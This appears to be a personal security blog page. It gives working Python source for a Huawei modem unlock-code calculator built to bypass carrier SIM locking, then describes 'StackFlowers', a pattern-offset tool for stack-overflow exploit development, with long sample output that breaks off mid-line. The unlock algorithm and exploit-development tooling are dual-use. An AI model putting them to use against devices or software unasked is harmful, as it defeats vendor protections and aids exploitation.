Huawei modem unlock calculator
Any time i’ve been using modem (i use huawei e169) for my internet connections. because i like the flexibility and realibility for use on my notebook. but 2 days ago, i was late to pay the bill and my connection was disconnected. i read the bill, and the bill was so high than other provider. i want to move to other provider, but i can’t. because the modem was locked by provider and only can using the sim card from the provider. yes i hear there is any way to unlock the modem, but i must pay at the service. because of that i’m doing some research and looking for the unlock code algorithm used by huawei modem. and i got it and did it in my program. now i can freely use any sim card on my modem. here it is, the source code contains the algorithm or you can use by direct or import it to your own program ;) . hope you enjoy !
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330,
# Boston, MA 02111-1307 USA
#
# Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
# http://bit.ly/c0debreaker
import hashlib, string
__author__ = "Gunslinger_ <yudha.gunslinger@gmail.com>"
__date__ = "Tue, 14 Jun 2011 23:22:42 +0700"
__version__ = "1.0"
__copyright__ = "Copyright (c) 2010 Gunslinger_"
class huawei_modem_unlocker(object):
"""
Instance variables:
Imei
Imei of the modem will be calculated
Default : '0'
Verbose
Display how algorithm working
Default : False
"""
def __init__(self, imei='0', verbose=False):
''' Huawei modem unlocker class constructor '''
self._imei = imei
self._verbose = verbose
self._md5u = hashlib.md5(str(imei)+str('5e8dd316726b0335')).hexdigest()
self._md5f = hashlib.md5(str(imei)+str('97b7bc6be525ab44')).hexdigest()
self._unlock_code = ''
self._flash_code = ''
# verbose formating
self._width = 21
self._w = 10
self._header_format = '%-*s%*s'
self._format = ' %d | %-*s | %*s '
def xor_digits(self, source, counter):
''' Get a value and xoring it during looping iteration '''
digits = int('0x0'+source[0+counter:2+counter],16) ^ \
int('0x0'+source[8+counter:8+2+counter],16) ^ \
int('0x0'+source[16+counter:16+2+counter],16) ^ \
int('0x0'+source[24+counter:24+2+counter],16)
return digits
def calc(self):
''' Process calculate with the algorithm (read source code) '''
cnt = 0
cnt2 = 1
if self._verbose:
print "="*(self._width+13)
print " Iter."+"|"+ " Unlock byte "+"|"+" Flash byte "
print "-"*(self._width+13)
while cnt < 8:
digits_unlock = self.xor_digits(self._md5u, cnt)
digits_flash = self.xor_digits(self._md5f, cnt)
unlock_byte = string.zfill(hex(digits_unlock)[2:],2)
flash_byte = string.zfill(hex(digits_flash)[2:],2)
self._unlock_code = str(self._unlock_code)+str(unlock_byte)
self._flash_code = str(self._flash_code)+str(flash_byte)
if self._verbose: print self._format % (int(cnt2), self._width - self._w, self._unlock_code , self._w, self._flash_code)
cnt +=2
cnt2 +=1
if self._verbose:
print "="*(self._width+13)
print "\nUNLOCK CODE = %d & %d | %d = %d" % (int('0x0'+self._unlock_code,16), 33554431, 33554432, eval("int('0x0'+self._unlock_code,16) & 33554431 | 33554432"))
print "FLASH CODE = %d & %d | %d = %d\n" % (int('0x0'+self._flash_code,16), 33554431, 33554432, eval("int('0x0'+self._flash_code,16) & 33554431 | 33554432"))
self._unlock_code = int('0x0'+self._unlock_code,16) & 33554431 | 33554432
self._flash_code = int('0x0'+self._flash_code,16) & 33554431 | 33554432
return (self._unlock_code, self._flash_code)
def run(self):
''' Fire it up ! '''
self.calc()
return (self._unlock_code, self._flash_code)
if __name__ == '__main__':
print "\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __author__)
inpimei = raw_input("Please input modem IMEI : ")
cracker = huawei_modem_unlocker(inpimei)
a, b = cracker.run()
print "\n-> IMEI = %s" % (inpimei)
print "-> UNLOCK CODE = %s" % (a)
print "-> FLASH CODE = %s" % (b)
StackFlowers | let’s flow it with the flowers
StackFlowers is a program that create pattern at the buffer, calculate pattern offset, write pattern buffer into specific variable name & programming language. Used for stack overflow exploit development.
Preview :
Nicely i’ve been created stand alone win32 executable for direct use of win32 exploit development.
in this example, we create 5000 bytes of pattern. to know how bytes eip overwriten exactly
this option will create pattern 5000 bytes.
gunslinger@c0debreaker:/media/disk/stackflowers$ ./StackFlowers.py -c -s 5000 StackFlowers v.0.8 by Gunslinger_ <yudha.gunslinger@gmail.com> , .--'|} / /}} .=\.--'`\} //` '---./` || /| \\| | |\_\\/ \__/\\ \\ \| "Lets flow with the flowers" Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk Output has been saved in StackFlowers.log gunslinger@c0debreaker:/media/disk/stackflowers$
or we can use it direct to write the pattern into specific variable & programming language.
this options will create 5000 bytes of pattern with variable name “buffer” with python programming style. and split the pattern every 50 bytes.
StackFlowers v.0.8 by Gunslinger_ <yudha.gunslinger@gmail.com> , .--'|} / /}} .=\.--'`\} //` '---./` || /| \\| | |\_\\/ \__/\\ \\ \| "Lets flow with the flowers" buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab" buff += "6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A" buff += "d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9" buff += "Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag" buff += "6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A" buff += "i3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" buff += "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al" buff += "6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A" buff += "n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9" buff += "Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" buff += "6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A" buff += "s3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" buff += "Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av" buff += "6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A" buff += "x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9" buff += "Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba" buff += "6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2B" buff += "c3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9" buff += "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf" buff += "6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" buff += "h3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9" buff += "Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" buff += "6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2B" buff += "m3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9" buff += "Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp" buff += "6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B" buff += "r3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9" buff += "Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu" buff += "6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2B" buff += "w3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9" buff += "By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz" buff += "6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C" buff += "b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9" buff += "Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce" buff += "6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C" buff += "g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9" buff += "Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj" buff += "6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C" buff += "l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9" buff += "Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" buff += "6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C" buff += "q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9" buff += "Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct" buff += "6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C" buff += "v3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9" buff += "Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy" buff += "6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2D" buff += "a3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9" buff += "Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd" buff += "6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D" buff += "f3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9" buff += "Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di" buff += "6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2D" buff += "k3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9" buff += "Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn" buff += "6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D" buff += "p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9" buff += "Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds" buff += "6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D" buff += "u3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" buff += "Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx" buff += "6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2D" buff += "z3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9" buff += "Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec" buff += "6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2E" buff += "e3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9" buff += "Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh" buff += "6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2E" buff += "j3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9" buff += "El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em" buff += "6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2E" buff += "o3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9" buff += "Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er" buff += "6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2E" buff += "t3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9" buff += "Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew" buff += "6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2E" buff += "y3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9" buff += "Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb" buff += "6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F" buff += "d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9" buff += "Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg" buff += "6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2F" buff += "i3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9" buff += "Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl" buff += "6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2F" buff += "n3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9" buff += "Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq" buff += "6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2F" buff += "s3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9" buff += 